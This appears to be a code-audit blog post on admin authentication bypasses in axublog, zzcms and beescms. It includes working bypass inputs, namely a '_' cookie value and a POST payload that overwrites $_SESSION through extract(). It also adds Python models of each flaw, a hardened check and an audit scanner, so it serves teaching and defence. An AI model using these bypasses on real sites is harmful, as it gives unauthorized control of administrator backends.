Preface
Recently I audited several open source PHP programs and found that each of them allowed the admin backend authentication to be bypassed, in a different way every time. This post is a summary. The bypasses fall into three levels:
1. The backend page lacks the authentication check entirely.
2. The backend authentication check exists but is not rigorous.
3. A variable-overwrite vulnerability makes the backend authentication check ineffective.
Below are the PHP programs I audited, grouped by level.
Backend page lacks the authentication check
For example, the admin backend of axublog 1.0.2 has a function chkadcookie() that verifies the administrator's login. However, ad/art.php in the backend never calls chkadcookie(), so that page can be used without logging in.
The cause is simple: an inexperienced developer forgot to call the check function in one file. This kind of bug is comparatively rare today, but it is quick to find: list every file in the admin directory that does not call the check function (or include the file that does) and review each one.
Backend authentication check is not rigorous
This is the most common category, and it takes many strange forms.
axublog backend authentication bypass
Authentication logic
The backend authentication function in axublog is chkadcookie(); the code is as follows:
```php
function chkadcookie() {
    @$file = "../cache/txtchkad.txt";
    @$fp = fopen($file, "r");
    @$txtchkad = fread($fp, 4096);
    // remove every occurrence of the chkad cookie value from the file contents
    $txtchkad2 = str_replace(@$_COOKIE["chkad"], '', $txtchkad);
    // first gate: only rejects when both the session value and the cookie are empty
    if (@$_SESSION["chkad"] == '' && @$_COOKIE["chkad"] == '') {
        header("Content-type:text/html; charset=utf-8");
        echo '<div id=redmsg>Please <a href="login.php">log in</a>...</div><script>tiao();</script>';
        exit;
    }
    // second gate: unchanged contents means the cookie value does not occur in the file
    if ($txtchkad == $txtchkad2) {
        header("Content-type:text/html; charset=utf-8");
        echo '<div id=redmsg>Please <a href="login.php">log in</a>...</div><script>tiao();</script>';
        exit;
    }
}

function loginpass($str) {
    // $date is defined outside this excerpt; $str is not used
    $txtchkad = $_SERVER['HTTP_USER_AGENT'] . '_' . $_SERVER['REMOTE_ADDR'] . '_' . $date;
    $file = "../cache/txtchkad.txt";
    if (file_exists($file)) {
        $txt = file_get_contents($file);
        $txt = $txtchkad . "\r\n" . $txt;   // newest login first
    }
    // if the file does not exist yet, $txt is undefined and an empty file is written
    file_put_contents($file, $txt);
}
```
Reading the code reveals two interesting problems:
1. txtchkad.txt records, for every successful login, the client's $_SERVER['HTTP_USER_AGENT'] . '_' . $_SERVER['REMOTE_ADDR'] . '_' . $date. Only $date is unknown to us; the User-Agent is chosen by the client and REMOTE_ADDR is the client's own address.
2. The check $txtchkad2 = str_replace(@$_COOKIE["chkad"], '', $txtchkad); followed by if ($txtchkad == $txtchkad2) removes every occurrence of the chkad cookie value from the file contents and treats the request as logged in whenever the contents changed. In other words, any cookie value that occurs anywhere in txtchkad.txt passes the check; the first gate only requires the cookie to be non-empty. (A session value alone never suffices: with an empty cookie, str_replace() leaves the contents unchanged.)
Since we know what txtchkad.txt contains and the cookie is under our control, the check can be bypassed.
Bypass method
Every line that loginpass() writes contains the separator "_", so simply setting the cookie chkad to "_" bypasses the backend login. The only precondition is that the cache file is non-empty, which is the case as soon as any administrator has logged in once. Any other substring of the file, such as a fragment of a common User-Agent, works just as well.
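The following is an added example (not code from the original post or from axublog) that ports the two gates of chkadcookie() to Python so the bypass class can be checked offline, and places a hardened check beside it. The file contents are a constructed sample in the format loginpass() writes; the token store and the hardened function names are assumptions. It goes slightly beyond the post by showing that every substring of the file, not only "_", passes the vulnerable check.

```python
import hmac
import secrets

# Constructed stand-in for ../cache/txtchkad.txt: one "UA_IP_date" line per
# successful login, newest first, in the format loginpass() writes.
TXTCHKAD_SAMPLE = (
    "Mozilla/5.0 (X11; Linux x86_64) Firefox/115.0_203.0.113.7_2023-09-01 10:21:05\r\n"
    "Mozilla/5.0 (Windows NT 10.0) Chrome/116.0_198.51.100.23_2023-08-30 08:02:11\r\n"
)


def chkadcookie_accepts(txtchkad: str, cookie_chkad: str, session_chkad: str = "") -> bool:
    """Python port of axublog's chkadcookie(): True when the request counts as logged in."""
    # first gate: only rejects when both the session value and the cookie are empty
    if session_chkad == "" and cookie_chkad == "":
        return False
    # second gate: str_replace() of the cookie value; the contents change iff the
    # cookie value occurs somewhere in the file (an empty cookie never changes them)
    txtchkad2 = txtchkad.replace(cookie_chkad, "")
    return txtchkad != txtchkad2


def guessable_bypass_values(txtchkad: str) -> list:
    """Cookie values that pass without knowing $date: any substring of the file.

    The candidates are things an attacker can name blind; the separator "_"
    is present in every line loginpass() ever wrote."""
    candidates = ["_", "Mozilla/5.0", "2023-", "/"]
    return [c for c in candidates if chkadcookie_accepts(txtchkad, c)]


# Hardened form (an assumption added here, not axublog's code): store an
# unguessable random token per login and require the whole cookie to match it.
def issue_login_token(token_store: set) -> str:
    token = secrets.token_hex(32)
    token_store.add(token)
    return token


def hardened_accepts(token_store: set, cookie_chkad: str) -> bool:
    # exact match over the full value, compared in constant time; substrings fail
    return any(hmac.compare_digest(t.encode(), cookie_chkad.encode()) for t in token_store)


if __name__ == "__main__":
    print("vulnerable check accepts:", guessable_bypass_values(TXTCHKAD_SAMPLE))
    store = set()
    tok = issue_login_token(store)
    print("hardened check accepts '_':", hardened_accepts(store, "_"))
    print("hardened check accepts the real token:", hardened_accepts(store, tok))
```

In a real fix the token would also be bound to the server-side session rather than kept in a world-readable cache file; the point here is that the comparison must be an exact match of an unguessable value, not a substring search over data the client helped to write.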
zzcms backend authentication bypass
Authentication logic
The backend authentication code in zzcms is as follows:
```php
<?php
if (isset($_SESSION["admin"]) && isset($_SESSION["pass"])) {
    $sql = "select * from zzcms_admin where admin='" . $_SESSION["admin"] . "'";
    $rs = query($sql) or showmsg('Error looking up administrator');
    $ok = is_array($row = fetch_array($rs));
    if ($ok) {
        if ($_SESSION["pass"] != $row['pass']) {
            showmsg('Incorrect administrator password, you are not allowed to access this page', '/admin/login.php');
        }
    } else {
        showmsg('The administrator no longer exists, you are not allowed to access this page', '/admin/login.php');
    }
} else {
    session_write_close();
    // client-side redirect only: no exit() follows, so the rest of the page still runs
    echo("<script>top.location.href = '/admin/login.php';</script>");
}
?>
```
If admin and pass are not both present in the session, the code falls into the else branch, whose redirect is:
echo("<script>top.location.href = '/admin/login.php';</script>");
The redirect is performed by JavaScript in the browser; on the server nothing stops the script, because there is no exit() after the echo. The code that follows the check still executes and its output is sent to the client together with the redirect, so this verification method is useless.
Bypass method
The bypass is trivial: disable JavaScript in the browser, and the redirect is never performed while the rest of the page is still delivered. A client that does not execute JavaScript at all, such as curl, sees the admin page without doing anything special.
Variable overwrite vulnerability causes backend authentication failure
beescms backend authentication bypass
Authentication logic
The login check function is is_login():
```php
function is_login() {
    if ($_SESSION['login_in'] == 1 && $_SESSION['admin']) {
        if (time() - $_SESSION['login_time'] > 3600) {
            login_out();   // defined elsewhere; as excerpted, return 1 is still reached below
        } else {
            $_SESSION['login_time'] = time();
            @session_regenerate_id();
        }
        return 1;
    } else {
        return 0;
    }
}
```
As long as the user cannot control the values in the session, this code is fine.
However, further analysis found that every file includes includes/init.php, which contains the following code:
```php
session_start();
$_COOKIE = fl_value($_COOKIE);
$_GET = fl_value($_GET);
// $_POST is not filtered at all; every request parameter becomes a global variable
@extract($_POST);
@extract($_GET);
@extract($_COOKIE);

function fl_value($str) {
    if (empty($str)) {
        return;
    }
    return preg_replace('/select|insert | update | and | in | on | left | joins | delete |\%|\=|\/\*|\*|\.\.\/|\.\/| union | from | where | group | into |load_file|outfile/i', '', $str);
}
```
In the code above, $_POST is never passed through fl_value(), and it is then handed to extract(). With its default EXTR_OVERWRITE flag, extract() turns every key of the array into a variable in the current (global) scope and overwrites any existing variable of the same name, including $_SESSION. We can therefore bypass the check by sending POST parameters that replace the contents of $_SESSION.
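To make the mechanism concrete, here is an added Python model (not beescms code, and not part of the original post) of what happens inside one request: PHP's bracketed parameter names are parsed into nested arrays, extract() replaces the $_SESSION variable with the attacker's array, and a port of is_login() then accepts it. PHP semantics are modelled only as far as needed (loose comparisons, string-to-int conversion, the GLOBALS/this exclusion of extract()); fl_value() is left out because it does not touch $_POST. Function names and the simulated session persistence are assumptions of this example.

```python
import re
import time
from urllib.parse import parse_qsl

VALID_NAME = re.compile(r"^[A-Za-z_\x80-\xff][A-Za-z0-9_\x80-\xff]*$")


def php_parse_body(body: str) -> dict:
    """Build $_POST the way PHP does: a parameter named a[b][c] becomes nested
    arrays (dicts here). Numeric auto-indexing (a[]) and PHP's renaming of
    '.' and ' ' to '_' in names are not modelled."""
    result = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        base, bracket, rest = name.partition("[")
        keys = [base]
        if bracket:
            keys += [k[:-1] for k in rest.split("[") if k.endswith("]")]
        node = result
        for key in keys[:-1]:
            node = node.setdefault(key, {})
        node[keys[-1]] = value
    return result


def php_extract(symbols: dict, array: dict) -> int:
    """Model of extract($array) with the default EXTR_OVERWRITE flag at file scope:
    each key becomes a global variable, replacing any existing one (including a
    superglobal such as $_SESSION). Invalid identifiers and GLOBALS/this are
    skipped. Returns the number of variables set."""
    count = 0
    for name, value in array.items():
        if name in ("GLOBALS", "this") or not VALID_NAME.match(name):
            continue
        symbols[name] = value
        count += 1
    return count


def php_int(value) -> int:
    """PHP's int conversion for the numeric strings that reach the arithmetic."""
    try:
        return int(value)
    except (TypeError, ValueError):
        return 0


def is_login(symbols: dict, now: int = None) -> int:
    """Port of beescms is_login(); the loose '== 1' is modelled by string comparison."""
    now = int(time.time()) if now is None else now
    sess = symbols.get("_SESSION")
    if not isinstance(sess, dict):
        return 0
    admin = sess.get("admin")
    if str(sess.get("login_in", "")) == "1" and admin not in (None, "", "0", 0):
        if now - php_int(sess.get("login_time")) > 3600:
            sess.clear()  # stands in for login_out(); as excerpted, is_login() still returns 1
        else:
            sess["login_time"] = now
        return 1
    return 0


def simulate_request(body: str, session: dict, now: int = None):
    """One request through includes/init.php and then is_login(): session_start()
    binds the stored session, extract() runs over $_POST, $_GET and $_COOKIE, and
    whatever $_SESSION holds afterwards is what PHP saves for the next request.
    Returns (is_login result, saved session)."""
    symbols = {
        "_SESSION": dict(session),
        "_POST": php_parse_body(body),
        "_GET": {},
        "_COOKIE": {},
    }
    for superglobal in ("_POST", "_GET", "_COOKIE"):
        php_extract(symbols, symbols[superglobal])
    result = is_login(symbols, now)
    saved = symbols["_SESSION"] if isinstance(symbols["_SESSION"], dict) else {}
    return result, saved


PAYLOAD = "_SESSION[login_in]=1&_SESSION[admin]=1&_SESSION[login_time]=99999999999"

if __name__ == "__main__":
    ok, saved = simulate_request(PAYLOAD, {})
    print("request with payload: is_login =", ok, "saved session =", saved)
    ok2, _ = simulate_request("", saved)
    print("next request, same session cookie, no payload: is_login =", ok2)
```

The model shows why the parameter names need the bracket syntax: the attacker must replace $_SESSION with an array that has the three keys is_login() reads, so plain login_in=1&admin=1 creates two unrelated globals and changes nothing.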
Bypass method
The bypass is simple. Send a POST request to a page that includes init.php, for example index.php:
POST: _SESSION[login_in]=1&_SESSION[admin]=1&_SESSION[login_time]=99999999999
PHP turns the bracketed parameter names into an array, so after extract() the session variables exist: $_SESSION['login_in'] = 1, $_SESSION['admin'] = 1 and $_SESSION['login_time'] = 99999999999 (far enough in the future that the 3600-second expiry check in is_login() never fires). The new $_SESSION contents are saved when the request ends, so visit the admin page with the same session cookie and you are logged in.
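All three levels in this post can be screened for mechanically. The following is an added example (not from the original post or any of the projects) of a small Python audit helper that runs over a {path: source} tree and reports: backend files that never call the check function (level 1), redirects that are not followed by exit() or die() before the enclosing block closes (level 2, extended to header("Location: ...") as the same class of bug), and extract() calls fed directly from $_POST, $_GET, $_COOKIE or $_REQUEST (level 3). The three source trees are constructed from the excerpts above and are not the projects' real files; the matching is textual, so it is a triage aid, not a proof.

```python
import re

# Constructed PHP trees modelled on the three excerpts in this post; they are
# not the projects' real files, just enough to exercise each check.
AXUBLOG = {
    "ad/index.php": "<?php include('head.php');\nchkadcookie();\n/* dashboard */",
    "ad/art.php": "<?php include('head.php');\n/* article editor, the check is never called */",
    "ad/login.php": "<?php /* login form, legitimately reachable without a session */",
}
ZZCMS = {
    "admin/check.php": """<?php
if (isset($_SESSION["admin"]) && isset($_SESSION["pass"])) {
    /* password check against the admin table */
} else {
    session_write_close();
    echo("<script>top.location.href = '/admin/login.php';</script>");
}
/* everything below still runs for an unauthenticated visitor */
?>""",
    "admin/login.php": """<?php
if (!$ok) {
    echo("<script>top.location.href = '/admin/login.php';</script>");
    exit;
}
?>""",
}
BEESCMS = {
    "includes/init.php": """<?php
session_start();
$_COOKIE = fl_value($_COOKIE);
$_GET = fl_value($_GET);
@extract($_POST);
@extract($_GET);
@extract($_COOKIE);
""",
}

# a client-side (JavaScript) or header redirect being emitted
REDIRECT_RE = re.compile(r"""echo\s*\(?\s*["'][^"']*location\.(href|replace)|header\s*\(\s*["']\s*Location:""", re.I)
TERMINATE_RE = re.compile(r"\b(exit|die)\b")
EXTRACT_RE = re.compile(r"\bextract\s*\(\s*\$_(POST|GET|COOKIE|REQUEST)\b")


def files_missing_check(sources: dict, check_name: str, exclude=()) -> list:
    """Level 1: files that never call the check function. Textual match, so a
    call that only appears in a comment would hide a real omission."""
    call = re.compile(r"\b%s\s*\(" % re.escape(check_name))
    return sorted(p for p, src in sources.items() if p not in exclude and not call.search(src))


def redirects_without_exit(src: str) -> list:
    """Level 2: 1-based line numbers of redirects with no exit/die before the
    enclosing block closes, so execution falls through into the protected page."""
    lines = src.splitlines()
    flagged = []
    for i, line in enumerate(lines):
        m = REDIRECT_RE.search(line)
        if not m:
            continue
        terminated = bool(TERMINATE_RE.search(line[m.end():]))
        for following in lines[i + 1:]:
            if terminated or following.strip().startswith("}"):
                break
            terminated = bool(TERMINATE_RE.search(following))
        if not terminated:
            flagged.append(i + 1)
    return flagged


def request_extracts(src: str) -> list:
    """Level 3: (line, superglobal) for every extract() fed straight from the request."""
    hits = []
    for i, line in enumerate(src.splitlines()):
        m = EXTRACT_RE.search(line)
        if m:
            hits.append((i + 1, m.group(1)))
    return hits


def scan_tree(sources: dict, check_name: str = None, exclude=()) -> dict:
    """Run all three checks over a {path: source} tree and return a findings report."""
    report = {"missing_check": [], "redirect_without_exit": {}, "request_extract": {}}
    if check_name:
        report["missing_check"] = files_missing_check(sources, check_name, exclude)
    for path, src in sources.items():
        redirects = redirects_without_exit(src)
        if redirects:
            report["redirect_without_exit"][path] = redirects
        extracts = request_extracts(src)
        if extracts:
            report["request_extract"][path] = extracts
    return report


if __name__ == "__main__":
    print(scan_tree(AXUBLOG, "chkadcookie", exclude=("ad/login.php",)))
    print(scan_tree(ZZCMS))
    print(scan_tree(BEESCMS))
```

On a real checkout, read the files from disk into the same {path: source} shape and pass the login and logout pages as exclude; every hit still needs manual confirmation, since a check can be provided by an include that the regex does not see.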
Summary
When I started learning code auditing I found these problems very interesting, so I wrote this summary. There are of course other kinds of backend bypass, and I welcome further advice.